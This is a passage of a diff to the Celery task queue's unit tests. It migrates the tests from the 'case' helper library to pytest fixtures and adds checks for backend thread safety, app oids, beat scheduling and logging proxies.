+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import ImproperlyConfigured
from celery.loaders.base import unconfigured
from celery.platforms import pyimplementation
@@ -23,6 +25,7 @@
from celery.utils.objects import Bunch
from celery.utils.serialization import pickle
from celery.utils.time import localize, timezone, to_utc
+from t.unit import conftest
THIS_IS_A_KEY = 'this is a value'
@@ -218,6 +221,13 @@ def test_using_v1_reduce(self):
self.app._using_v1_reduce = True
assert loads(dumps(self.app))
+ def test_autodiscover_tasks_force_fixup_fallback(self):
+ self.app.loader.autodiscover_tasks = Mock()
+ self.app.autodiscover_tasks([], force=True)
+ self.app.loader.autodiscover_tasks.assert_called_with(
+ [], 'tasks',
+ )
+
def test_autodiscover_tasks_force(self):
self.app.loader.autodiscover_tasks = Mock()
self.app.autodiscover_tasks(['proj.A', 'proj.B'], force=True)
@@ -265,6 +275,14 @@ def test_with_broker(self, patching):
with self.Celery(broker='foo://baribaz') as app:
assert app.conf.broker_url == 'foo://baribaz'
+ def test_pending_configuration_non_true__kwargs(self):
+ with self.Celery(task_create_missing_queues=False) as app:
+ assert app.conf.task_create_missing_queues is False
+
+ def test_pending_configuration__kwargs(self):
+ with self.Celery(foo='bar') as app:
+ assert app.conf.foo == 'bar'
+
def test_pending_configuration__setattr(self):
with self.Celery(broker='foo://bar') as app:
app.conf.task_default_delivery_mode = 44
@@ -494,6 +512,16 @@ def foo():
finally:
_imports.MP_MAIN_FILE = None
+ def test_can_get_type_hints_for_tasks(self):
+ import typing
+
+ with self.Celery() as app:
+ @app.task
+ def foo(parameter: int) -> None:
+ pass
+
+ assert typing.get_type_hints(foo) == {'parameter': int, 'return': type(None)}
+
def test_annotate_decorator(self):
from celery.app.task import Task
@@ -556,20 +584,12 @@ def test_pickle_app(self):
for key, value in changes.items():
assert restored.conf[key] == value
- # def test_worker_main(self):
- # from celery.bin import worker as worker_bin
- #
- # class worker(worker_bin.worker):
- #
- # def execute_from_commandline(self, argv):
- # return argv
- #
- # prev, worker_bin.worker = worker_bin.worker, worker
- # try:
- # ret = self.app.worker_main(argv=['--version'])
- # assert ret == ['--version']
- # finally:
- # worker_bin.worker = prev
+ @patch('celery.bin.celery.celery')
+ def test_worker_main(self, mocked_celery):
+ self.app.worker_main(argv=['worker', '--help'])
+
+ mocked_celery.main.assert_called_with(
+ args=['worker', '--help'], standalone_mode=False)
def test_config_from_envvar(self):
os.environ['CELERYTEST_CONFIG_OBJECT'] = 't.unit.app.test_app'
@@ -752,6 +772,11 @@ def test_config_from_envvar_more(self, key='CELERY_HARNESS_CFG1'):
assert self.app.conf['FOO'] == 10
assert self.app.conf['BAR'] == 20
+ @patch('celery.bin.celery.celery')
+ def test_start(self, mocked_celery):
+ self.app.start()
+ mocked_celery.main.assert_called()
+
@pytest.mark.parametrize('url,expected_fields', [
('pyamqp://', {
'hostname': 'localhost',
@@ -891,10 +916,10 @@ def add(x, y):
assert 'add1' in self.app.conf.beat_schedule
assert 'add2' in self.app.conf.beat_schedule
- def test_pool_no_multiprocessing(self):
- with mock.mask_modules('multiprocessing.util'):
- pool = self.app.pool
- assert pool is self.app._pool
+ @pytest.mark.masked_modules('multiprocessing.util')
+ def test_pool_no_multiprocessing(self, mask_modules):
+ pool = self.app.pool
+ assert pool is self.app._pool
def test_bugreport(self):
assert self.app.bugreport()
@@ -970,6 +995,63 @@ class CustomCelery(type(self.app)):
app = CustomCelery(set_as_current=False)
assert isinstance(app.tasks, TaskRegistry)
+ def test_oid(self):
+ # Test that oid is global value.
+ oid1 = self.app.oid
+ oid2 = self.app.oid
+ uuid.UUID(oid1)
+ uuid.UUID(oid2)
+ assert oid1 == oid2
+
+ def test_global_oid(self):
+ # Test that oid is global value also within threads
+ main_oid = self.app.oid
+ uuid.UUID(main_oid)
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: self.app.oid)
+ thread_oid = future.result()
+ uuid.UUID(thread_oid)
+ assert main_oid == thread_oid
+
+ def test_thread_oid(self):
+ # Test that thread_oid is global value in single thread.
+ oid1 = self.app.thread_oid
+ oid2 = self.app.thread_oid
+ uuid.UUID(oid1)
+ uuid.UUID(oid2)
+ assert oid1 == oid2
+
+ def test_backend(self):
+ # Test that app.bakend returns the same backend in single thread
+ backend1 = self.app.backend
+ backend2 = self.app.backend
+ assert isinstance(backend1, Backend)
+ assert isinstance(backend2, Backend)
+ assert backend1 is backend2
+
+ def test_thread_backend(self):
+ # Test that app.bakend returns the new backend for each thread
+ main_backend = self.app.backend
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: self.app.backend)
+ thread_backend = future.result()
+ assert isinstance(main_backend, Backend)
+ assert isinstance(thread_backend, Backend)
+ assert main_backend is not thread_backend
+
+ def test_thread_oid_is_local(self):
+ # Test that thread_oid is local to thread.
+ main_oid = self.app.thread_oid
+ uuid.UUID(main_oid)
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: self.app.thread_oid)
+ thread_oid = future.result()
+ uuid.UUID(thread_oid)
+ assert main_oid != thread_oid
+
class test_defaults:
@@ -997,26 +1079,26 @@ def test_enable_disable_trace(self):
class test_pyimplementation:
def test_platform_python_implementation(self):
- with mock.platform_pyimp(lambda: 'Xython'):
+ with conftest.platform_pyimp(lambda: 'Xython'):
assert pyimplementation() == 'Xython'
def test_platform_jython(self):
- with mock.platform_pyimp():
- with mock.sys_platform('java 1.6.51'):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('java 1.6.51'):
assert 'Jython' in pyimplementation()
def test_platform_pypy(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version((1, 4, 3)):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version((1, 4, 3)):
assert 'PyPy' in pyimplementation()
- with mock.pypy_version((1, 4, 3, 'a4')):
+ with conftest.pypy_version((1, 4, 3, 'a4')):
assert 'PyPy' in pyimplementation()
def test_platform_fallback(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version():
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version():
assert 'CPython' == pyimplementation()
diff --git a/t/unit/app/test_backends.py b/t/unit/app/test_backends.py
index a87f9665053..df4e47af772 100644
--- a/t/unit/app/test_backends.py
+++ b/t/unit/app/test_backends.py
@@ -1,10 +1,87 @@
+import threading
+from contextlib import contextmanager
from unittest.mock import patch
import pytest
+import celery.contrib.testing.worker as contrib_embed_worker
from celery.app import backends
from celery.backends.cache import CacheBackend
from celery.exceptions import ImproperlyConfigured
+from celery.utils.nodenames import anon_nodename
+
+
+class CachedBackendWithTreadTrucking(CacheBackend):
+ test_instance_count = 0
+ test_call_stats = {}
+
+ def _track_attribute_access(self, method_name):
+ cls = type(self)
+
+ instance_no = getattr(self, '_instance_no', None)
+ if instance_no is None:
+ instance_no = self._instance_no = cls.test_instance_count
+ cls.test_instance_count += 1
+ cls.test_call_stats[instance_no] = []
+
+ cls.test_call_stats[instance_no].append({
+ 'thread_id': threading.get_ident(),
+ 'method_name': method_name
+ })
+
+ def __getattribute__(self, name):
+ if name == '_instance_no' or name == '_track_attribute_access':
+ return super().__getattribute__(name)
+
+ if name.startswith('__') and name != '__init__':
+ return super().__getattribute__(name)
+
+ self._track_attribute_access(name)
+ return super().__getattribute__(name)
+
+
+@contextmanager
+def embed_worker(app,
+ concurrency=1,
+ pool='threading', **kwargs):
+ """
+ Helper embedded worker for testing.
+
+ It's based on a :func:`celery.contrib.testing.worker.start_worker`,
+ but doesn't modifies logging settings and additionally shutdown
+ worker pool.
+ """
+ # prepare application for worker
+ app.finalize()
+ app.set_current()
+
+ worker = contrib_embed_worker.TestWorkController(
+ app=app,
+ concurrency=concurrency,
+ hostname=anon_nodename(),
+ pool=pool,
+ # not allowed to override TestWorkController.on_consumer_ready
+ ready_callback=None,
+ without_heartbeat=kwargs.pop("without_heartbeat", True),
+ without_mingle=True,
+ without_gossip=True,
+ **kwargs
+ )
+
+ t = threading.Thread(target=worker.start, daemon=True)
+ t.start()
+ worker.ensure_started()
+
+ yield worker
+
+ worker.stop()
+ t.join(10.0)
+ if t.is_alive():
+ raise RuntimeError(
+ "Worker thread failed to exit within the allocated timeout. "
+ "Consider raising `shutdown_timeout` if your tasks take longer "
+ "to execute."
+ )
class test_backends:
@@ -35,3 +112,25 @@ def test_sym_raises_ValuError(self, app):
def test_backend_can_not_be_module(self, app):
with pytest.raises(ImproperlyConfigured):
backends.by_name(pytest, app.loader)
+
+ @pytest.mark.celery(
+ result_backend=f'{CachedBackendWithTreadTrucking.__module__}.'
+ f'{CachedBackendWithTreadTrucking.__qualname__}'
+ f'+memory://')
+ def test_backend_thread_safety(self):
+ @self.app.task
+ def dummy_add_task(x, y):
+ return x + y
+
+ with embed_worker(app=self.app, pool='threads'):
+ result = dummy_add_task.delay(6, 9)
+ assert result.get(timeout=10) == 15
+
+ call_stats = CachedBackendWithTreadTrucking.test_call_stats
+ # check that backend instance is used without same thread
+ for backend_call_stats in call_stats.values():
+ thread_ids = set()
+ for call_stat in backend_call_stats:
+ thread_ids.add(call_stat['thread_id'])
+ assert len(thread_ids) <= 1, \
+ "The same celery backend instance is used by multiple threads"
diff --git a/t/unit/app/test_beat.py b/t/unit/app/test_beat.py
index 4b8339f451b..641c7b7a0b2 100644
--- a/t/unit/app/test_beat.py
+++ b/t/unit/app/test_beat.py
@@ -127,7 +127,7 @@ class mScheduler(beat.Scheduler):
def __init__(self, *args, **kwargs):
self.sent = []
- beat.Scheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def send_task(self, name=None, args=None, kwargs=None, **options):
self.sent.append({'name': name,
@@ -196,6 +196,39 @@ def foo():
scheduler.apply_async(scheduler.Entry(task=foo.name, app=self.app, args=None, kwargs=None))
foo.apply_async.assert_called()
+ def test_apply_async_with_null_args_set_to_none(self):
+
+ @self.app.task(shared=False)
+ def foo():
+ pass
+ foo.apply_async = Mock(name='foo.apply_async')
+
+ scheduler = mScheduler(app=self.app)
+ entry = scheduler.Entry(task=foo.name, app=self.app, args=None,
+ kwargs=None)
+ entry.args = None
+ entry.kwargs = None
+
+ scheduler.apply_async(entry, advance=False)
+ foo.apply_async.assert_called()
+
+ def test_apply_async_without_null_args(self):
+
+ @self.app.task(shared=False)
+ def foo(moo: int):
+ return moo
+ foo.apply_async = Mock(name='foo.apply_async')
+
+ scheduler = mScheduler(app=self.app)
+ entry = scheduler.Entry(task=foo.name, app=self.app, args=None,
+ kwargs=None)
+ entry.args = (101,)
+ entry.kwargs = None
+
+ scheduler.apply_async(entry, advance=False)
+ foo.apply_async.assert_called()
+ assert foo.apply_async.call_args[0][0] == [101]
+
def test_should_sync(self):
@self.app.task(shared=False)
@@ -566,7 +599,7 @@ class MockPersistentScheduler(beat.PersistentScheduler):
def __init__(self, *args, **kwargs):
self.sent = []
- beat.PersistentScheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def send_task(self, task=None, args=None, kwargs=None, **options):
self.sent.append({'task': task,
@@ -706,12 +739,12 @@ def test_start(self):
s.sync()
assert sh.closed
assert sh.synced
- assert s._is_stopped.isSet()
+ assert s._is_stopped.is_set()
s.sync()
s.stop(wait=False)
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
s.stop(wait=True)
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
p = s.scheduler._store
s.scheduler._store = None
@@ -734,13 +767,13 @@ def test_start_tick_raises_exit_error(self):
s, sh = self.get_service()
s.scheduler.tick_raises_exit = True
s.start()
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
def test_start_manages_one_tick_before_shutdown(self):
s, sh = self.get_service()
s.scheduler.shutdown_service = s
s.start()
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
class test_EmbeddedService:
diff --git a/t/unit/app/test_builtins.py b/t/unit/app/test_builtins.py
index b1d28690876..dcbec4b201b 100644
--- a/t/unit/app/test_builtins.py
+++ b/t/unit/app/test_builtins.py
@@ -1,10 +1,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock
from celery import chord, group
from celery.app import builtins
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.functional import pass1
@@ -98,7 +98,7 @@ def setup(self):
)
self.app.conf.task_always_eager = True
self.task = builtins.add_group_task(self.app)
- BuiltinsCase.setup(self)
+ super().setup()
def test_apply_async_eager(self):
self.task.apply = Mock(name='apply')
@@ -133,7 +133,7 @@ def test_task__disable_add_to_parent(self, current_worker_task):
class test_chain(BuiltinsCase):
def setup(self):
- BuiltinsCase.setup(self)
+ super().setup()
self.task = builtins.add_chain_task(self.app)
def test_not_implemented(self):
@@ -145,7 +145,7 @@ class test_chord(BuiltinsCase):
def setup(self):
self.task = builtins.add_chord_task(self.app)
- BuiltinsCase.setup(self)
+ super().setup()
def test_apply_async(self):
x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s())
diff --git a/t/unit/app/test_control.py b/t/unit/app/test_control.py
index 5757af757b0..37fa3e8b2ae 100644
--- a/t/unit/app/test_control.py
+++ b/t/unit/app/test_control.py
@@ -95,7 +95,11 @@ def assert_broadcast_called(self, command,
def test_active(self):
self.inspect.active()
- self.assert_broadcast_called('active')
+ self.assert_broadcast_called('active', safe=None)
+
+ def test_active_safe(self):
+ self.inspect.active(safe=True)
+ self.assert_broadcast_called('active', safe=True)
def test_clock(self):
self.inspect.clock()
@@ -241,6 +245,12 @@ def assert_control_called_with_args(self, name, destination=None,
self.app.control.broadcast.assert_called_with(
name, destination=destination, arguments=args, **_options or {})
+ def test_serializer(self):
+ self.app.conf['task_serializer'] = 'test'
+ self.app.conf['accept_content'] = ['test']
+ assert control.Control(self.app).mailbox.serializer == 'test'
+ assert control.Control(self.app).mailbox.accept == ['test']
+
def test_purge(self):
self.app.amqp.TaskConsumer = Mock(name='TaskConsumer')
self.app.control.purge()
diff --git a/t/unit/app/test_exceptions.py b/t/unit/app/test_exceptions.py
index 3b42a0bed55..b881be4c028 100644
--- a/t/unit/app/test_exceptions.py
+++ b/t/unit/app/test_exceptions.py
@@ -12,7 +12,10 @@ def test_when_datetime(self):
def test_pickleable(self):
x = Retry('foo', KeyError(), when=datetime.utcnow())
- assert pickle.loads(pickle.dumps(x))
+ y = pickle.loads(pickle.dumps(x))
+ assert x.message == y.message
+ assert repr(x.exc) == repr(y.exc)
+ assert x.when == y.when
class test_Reject:
diff --git a/t/unit/app/test_loaders.py b/t/unit/app/test_loaders.py
index 97becf0e397..09c8a6fe775 100644
--- a/t/unit/app/test_loaders.py
+++ b/t/unit/app/test_loaders.py
@@ -4,7 +4,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery import loaders
from celery.exceptions import NotConfigured
@@ -69,9 +68,12 @@ def test_init_worker_process(self):
m.assert_called_with()
def test_config_from_object_module(self):
- self.loader.import_from_cwd = Mock()
+ self.loader.import_from_cwd = Mock(return_value={
+ "override_backends": {"db": "custom.backend.module"},
+ })
self.loader.config_from_object('module_name')
self.loader.import_from_cwd.assert_called_with('module_name')
+ assert self.loader.override_backends == {"db": "custom.backend.module"}
def test_conf_property(self):
assert self.loader.conf['foo'] == 'bar'
@@ -117,8 +119,8 @@ def test_read_configuration_not_a_package(self, find_module):
l.read_configuration(fail_silently=False)
@patch('celery.loaders.base.find_module')
- @mock.environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
- def test_read_configuration_py_in_name(self, find_module):
+ @pytest.mark.patched_environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
+ def test_read_configuration_py_in_name(self, find_module, environ):
find_module.side_effect = NotAPackage()
l = default.Loader(app=self.app)
with pytest.raises(NotAPackage):
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index 453c3f26702..32440862bd2 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -6,8 +6,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
-from case.utils import get_logger_handlers
from celery import signals, uuid
from celery.app.log import TaskFormatter
@@ -15,6 +13,7 @@
get_task_logger, in_sighandler)
from celery.utils.log import logger as base_logger
from celery.utils.log import logger_isa, task_logger
+from t.unit import conftest
class test_TaskFormatter:
@@ -103,8 +102,6 @@ def test_formatException_bytes(self, safe_str, fe):
raise Exception()
except Exception:
assert x.formatException(sys.exc_info())
- if sys.version_info[0] == 2:
- safe_str.assert_called()
@patch('logging.Formatter.format')
def test_format_object(self, _format):
@@ -167,12 +164,10 @@ def test_get_logger_root(self):
logger = get_logger(base_logger.name)
assert logger.parent is logging.root
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc(self):
+ def test_setup_logging_subsystem_misc(self, restore_logging):
self.app.log.setup_logging_subsystem(loglevel=None)
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc2(self):
+ def test_setup_logging_subsystem_misc2(self, restore_logging):
self.app.conf.worker_hijack_root_logger = True
self.app.log.setup_logging_subsystem()
@@ -185,18 +180,15 @@ def test_configure_logger(self):
self.app.log._configure_logger(None, sys.stderr, None, '', False)
logger.handlers[:] = []
- @mock.restore_logging()
- def test_setup_logging_subsystem_colorize(self):
+ def test_setup_logging_subsystem_colorize(self, restore_logging):
self.app.log.setup_logging_subsystem(colorize=None)
self.app.log.setup_logging_subsystem(colorize=True)
- @mock.restore_logging()
- def test_setup_logging_subsystem_no_mputil(self):
- with mock.mask_modules('billiard.util'):
- self.app.log.setup_logging_subsystem()
+ @pytest.mark.masked_modules('billiard.util')
+ def test_setup_logging_subsystem_no_mputil(self, restore_logging, mask_modules):
+ self.app.log.setup_logging_subsystem()
- @mock.restore_logging()
- def test_setup_logger(self):
+ def test_setup_logger(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=True)
logger.handlers = []
@@ -204,16 +196,14 @@ def test_setup_logger(self):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=None)
# setup_logger logs to stderr without logfile argument.
- assert (get_logger_handlers(logger)[0].stream is
+ assert (conftest.get_logger_handlers(logger)[0].stream is
sys.__stderr__)
- @mock.restore_logging()
- def test_setup_logger_no_handlers_stream(self):
+ def test_setup_logger_no_handlers_stream(self, restore_logging):
l = self.get_logger()
l.handlers = []
- with mock.stdouts() as outs:
- stdout, stderr = outs
+ with conftest.stdouts() as (stdout, stderr):
l = self.setup_logger(logfile=sys.stderr,
loglevel=logging.INFO, root=False)
l.info('The quick brown fox...')
@@ -222,10 +212,8 @@ def test_setup_logger_no_handlers_stream(self):
@patch('os.fstat')
def test_setup_logger_no_handlers_file(self, *args):
tempfile = mktemp(suffix='unittest', prefix='celery')
- _open = ('builtins.open' if sys.version_info[0] == 3
- else '__builtin__.open')
- with patch(_open) as osopen:
- with mock.restore_logging():
+ with patch('builtins.open') as osopen:
+ with conftest.restore_logging_context_manager():
files = defaultdict(StringIO)
def open_file(filename, *args, **kwargs):
@@ -240,16 +228,15 @@ def open_file(filename, *args, **kwargs):
l = self.setup_logger(
logfile=tempfile, loglevel=logging.INFO, root=False,
)
- assert isinstance(get_logger_handlers(l)[0],
+ assert isinstance(conftest.get_logger_handlers(l)[0],
logging.FileHandler)
assert tempfile in files
- @mock.restore_logging()
- def test_redirect_stdouts(self):
+ def test_redirect_stdouts(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
try:
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
self.app.log.redirect_stdouts_to_logger(
logger, loglevel=logging.ERROR,
)
@@ -261,19 +248,21 @@ def test_redirect_stdouts(self):
finally:
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__
- @mock.restore_logging()
- def test_logging_proxy(self):
+ def test_logging_proxy(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
p = LoggingProxy(logger, loglevel=logging.ERROR)
p.close()
p.write('foo')
assert 'foo' not in sio.getvalue()
p.closed = False
- p.write('foo')
- assert 'foo' in sio.getvalue()
+ p.write('\n')
+ assert sio.getvalue() == ''
+ write_res = p.write('foo ')
+ assert sio.getvalue() == 'foo \n'
+ assert write_res == 4
lines = ['baz', 'xuzzy']
p.writelines(lines)
for line in lines:
@@ -282,19 +271,42 @@ def test_logging_proxy(self):
p.close()
assert not p.isatty()
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
with in_sighandler():
p.write('foo')
assert stderr.getvalue()
- @mock.restore_logging()
- def test_logging_proxy_recurse_protection(self):
+ def test_logging_proxy_bytes(self, restore_logging):
+ logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
+ root=False)
+
+ with conftest.wrap_logger(logger) as sio:
+ p = LoggingProxy(logger, loglevel=logging.ERROR)
+ p.close()
+ p.write(b'foo')
+ assert 'foo' not in str(sio.getvalue())
+ p.closed = False
+ p.write(b'\n')
+ assert str(sio.getvalue()) == ''
+ write_res = p.write(b'foo ')
+ assert str(sio.getvalue()) == 'foo \n'
+ assert write_res == 4
+ p.flush()
+ p.close()
+ assert not p.isatty()
+
+ with conftest.stdouts() as (stdout, stderr):
+ with in_sighandler():
+ p.write(b'foo')
+ assert stderr.getvalue()
+
+ def test_logging_proxy_recurse_protection(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
p = LoggingProxy(logger, loglevel=logging.ERROR)
p._thread.recurse_protection = True
try:
- assert p.write('FOOFO') is None
+ assert p.write('FOOFO') == 0
finally:
p._thread.recurse_protection = False
@@ -339,7 +351,7 @@ class MockLogger(logging.Logger):
def __init__(self, *args, **kwargs):
self._records = []
- logging.Logger.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def handle(self, record):
self._records.append(record)
diff --git a/t/unit/app/test_routes.py b/t/unit/app/test_routes.py
index 309335e1923..fbb2803b4d1 100644
--- a/t/unit/app/test_routes.py
+++ b/t/unit/app/test_routes.py
@@ -16,6 +16,7 @@ def Router(app, *args, **kwargs):
def E(app, queues):
def expand(answer):
return Router(app, [], queues).expand_destination(answer)
+
return expand
@@ -46,6 +47,7 @@ def setup(self):
@self.app.task(shared=False)
def mytask(*args, **kwargs):
pass
+
self.mytask = mytask
def assert_routes_to_queue(self, queue, router, name,
@@ -56,7 +58,8 @@ def assert_routes_to_queue(self, queue, router, name,
kwargs = {}
if args is None:
args = []
- assert router.route(options, name, args, kwargs)['queue'].name == queue
+ assert router.route(options, name, args, kwargs)[
+ 'queue'].name == queue
def assert_routes_to_default_queue(self, router, name, *args, **kwargs):
self.assert_routes_to_queue(
@@ -85,10 +88,13 @@ def test_route_for_task__glob(self):
from re import compile
route = routes.MapRoute([
+ ('proj.tasks.bar*', {'queue': 'routeC'}),
('proj.tasks.*', 'routeA'),
('demoapp.tasks.bar.*', {'exchange': 'routeB'}),
(compile(r'(video|image)\.tasks\..*'), {'queue': 'media'}),
])
+ assert route('proj.tasks.bar') == {'queue': 'routeC'}
+ assert route('proj.tasks.bar.baz') == {'queue': 'routeC'}
assert route('proj.tasks.foo') == {'queue': 'routeA'}
assert route('demoapp.tasks.bar.moo') == {'exchange': 'routeB'}
assert route('video.tasks.foo') == {'queue': 'media'}
@@ -97,7 +103,7 @@ def test_route_for_task__glob(self):
def test_expand_route_not_found(self):
expand = E(self.app, self.app.amqp.Queues(
- self.app.conf.task_queues, False))
+ self.app.conf.task_queues, False))
route = routes.MapRoute({'a': {'queue': 'x'}})
with pytest.raises(QueueNotFound):
expand(route('a'))
diff --git a/t/unit/app/test_schedules.py b/t/unit/app/test_schedules.py
index 881791a10ed..a8bed808a30 100644
--- a/t/unit/app/test_schedules.py
+++ b/t/unit/app/test_schedules.py
@@ -2,16 +2,16 @@
from contextlib import contextmanager
from datetime import datetime, timedelta
from pickle import dumps, loads
+from unittest import TestCase
from unittest.mock import Mock
import pytest
import pytz
-from case import Case
from celery.schedules import (ParseException, crontab, crontab_parser,
schedule, solar)
-assertions = Case('__init__')
+assertions = TestCase('__init__')
@contextmanager
diff --git a/t/unit/apps/test_multi.py b/t/unit/apps/test_multi.py
index f7de1d5e27f..4c3fd9bfc1f 100644
--- a/t/unit/apps/test_multi.py
+++ b/t/unit/apps/test_multi.py
@@ -69,7 +69,7 @@ def test_parse(self, gethostname, mkdirs_mock):
'--', '.disable_rate_limits=1',
])
p.parse()
- it = multi_args(p, cmd='COMMAND', append='*AP*',
+ it = multi_args(p, cmd='celery multi', append='*AP*',
prefix='*P*', suffix='*S*')
nodes = list(it)
@@ -85,32 +85,32 @@ def assert_line_in(name, args):
assert_line_in(
'*P*jerry@*S*',
- ['COMMAND', '-n *P*jerry@*S*', '-Q bar',
+ ['celery multi', '-n *P*jerry@*S*', '-Q bar',
'-c 5', '--flag', '--logfile=/var/log/celery/foo',
'-- .disable_rate_limits=1', '*AP*'],
)
assert_line_in(
'*P*elaine@*S*',
- ['COMMAND', '-n *P*elaine@*S*', '-Q bar',
+ ['celery multi', '-n *P*elaine@*S*', '-Q bar',
'-c 5', '--flag', '--logfile=/var/log/celery/foo',
'-- .disable_rate_limits=1', '*AP*'],
)
assert_line_in(
'*P*kramer@*S*',
- ['COMMAND', '--loglevel=DEBUG', '-n *P*kramer@*S*',
+ ['celery multi', '--loglevel=DEBUG', '-n *P*kramer@*S*',
'-Q bar', '--flag', '--logfile=/var/log/celery/foo',
'-- .disable_rate_limits=1', '*AP*'],
)
expand = nodes[0].expander
assert expand('%h') == '*P*jerry@*S*'
assert expand('%n') == '*P*jerry'
- nodes2 = list(multi_args(p, cmd='COMMAND', append='',
+ nodes2 = list(multi_args(p, cmd='celery multi', append='',
prefix='*P*', suffix='*S*'))
assert nodes2[0].argv[-1] == '-- .disable_rate_limits=1'
p2 = NamespacedOptionParser(['10', '-c:1', '5'])
p2.parse()
- nodes3 = list(multi_args(p2, cmd='COMMAND'))
+ nodes3 = list(multi_args(p2, cmd='celery multi'))
def _args(name, *args):
return args + (
@@ -123,40 +123,40 @@ def _args(name, *args):
assert len(nodes3) == 10
assert nodes3[0].name == 'celery1@example.com'
assert nodes3[0].argv == (
- 'COMMAND', '-c 5', '-n celery1@example.com') + _args('celery1')
+ 'celery multi', '-c 5', '-n celery1@example.com') + _args('celery1')
for i, worker in enumerate(nodes3[1:]):
assert worker.name == 'celery%s@example.com' % (i + 2)
node_i = f'celery{i + 2}'
assert worker.argv == (
- 'COMMAND',
+ 'celery multi',
f'-n {node_i}@example.com') + _args(node_i)
- nodes4 = list(multi_args(p2, cmd='COMMAND', suffix='""'))
+ nodes4 = list(multi_args(p2, cmd='celery multi', suffix='""'))
assert len(nodes4) == 10
assert nodes4[0].name == 'celery1@'
assert nodes4[0].argv == (
- 'COMMAND', '-c 5', '-n celery1@') + _args('celery1')
+ 'celery multi', '-c 5', '-n celery1@') + _args('celery1')
p3 = NamespacedOptionParser(['foo@', '-c:foo', '5'])
p3.parse()
- nodes5 = list(multi_args(p3, cmd='COMMAND', suffix='""'))
+ nodes5 = list(multi_args(p3, cmd='celery multi', suffix='""'))
assert nodes5[0].name == 'foo@'
assert nodes5[0].argv == (
- 'COMMAND', '-c 5', '-n foo@') + _args('foo')
+ 'celery multi', '-c 5', '-n foo@') + _args('foo')
p4 = NamespacedOptionParser(['foo', '-Q:1', 'test'])
p4.parse()
- nodes6 = list(multi_args(p4, cmd='COMMAND', suffix='""'))
+ nodes6 = list(multi_args(p4, cmd='celery multi', suffix='""'))
assert nodes6[0].name == 'foo@'
assert nodes6[0].argv == (
- 'COMMAND', '-Q test', '-n foo@') + _args('foo')
+ 'celery multi', '-Q test', '-n foo@') + _args('foo')
p5 = NamespacedOptionParser(['foo@bar', '-Q:1', 'test'])
p5.parse()
- nodes7 = list(multi_args(p5, cmd='COMMAND', suffix='""'))
+ nodes7 = list(multi_args(p5, cmd='celery multi', suffix='""'))
assert nodes7[0].name == 'foo@bar'
assert nodes7[0].argv == (
- 'COMMAND', '-Q test', '-n foo@bar') + _args('foo')
+ 'celery multi', '-Q test', '-n foo@bar') + _args('foo')
p6 = NamespacedOptionParser(['foo@bar', '-Q:0', 'test'])
p6.parse()
@@ -192,8 +192,7 @@ def test_from_kwargs(self):
max_tasks_per_child=30, A='foo', Q='q1,q2', O='fair',
)
assert sorted(n.argv) == sorted([
- '-m celery worker --detach',
- '-A foo',
+ '-m celery -A foo worker --detach',
f'--executable={n.executable}',
'-O fair',
'-n foo@bar.com',
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 82dd49d1514..4486f0b52c0 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -12,7 +12,7 @@
try:
import pyArango
except ImportError:
- pyArango = None # noqa
+ pyArango = None
pytest.importorskip('pyArango')
@@ -71,7 +71,8 @@ def test_config_params(self):
'password': 'mysecret',
'database': 'celery_database',
'collection': 'celery_collection',
- 'http_protocol': 'https'
+ 'http_protocol': 'https',
+ 'verify': True
}
x = ArangoDbBackend(app=self.app)
assert x.host == 'test.arangodb.com'
@@ -82,6 +83,7 @@ def test_config_params(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'https'
assert x.arangodb_url == 'https://test.arangodb.com:8529'
+ assert x.verify is True
def test_backend_by_url(
self, url="arangodb://username:password@host:port/database/collection"
@@ -106,6 +108,7 @@ def test_backend_params_by_url(self):
assert x.collection == 'celery_collection'
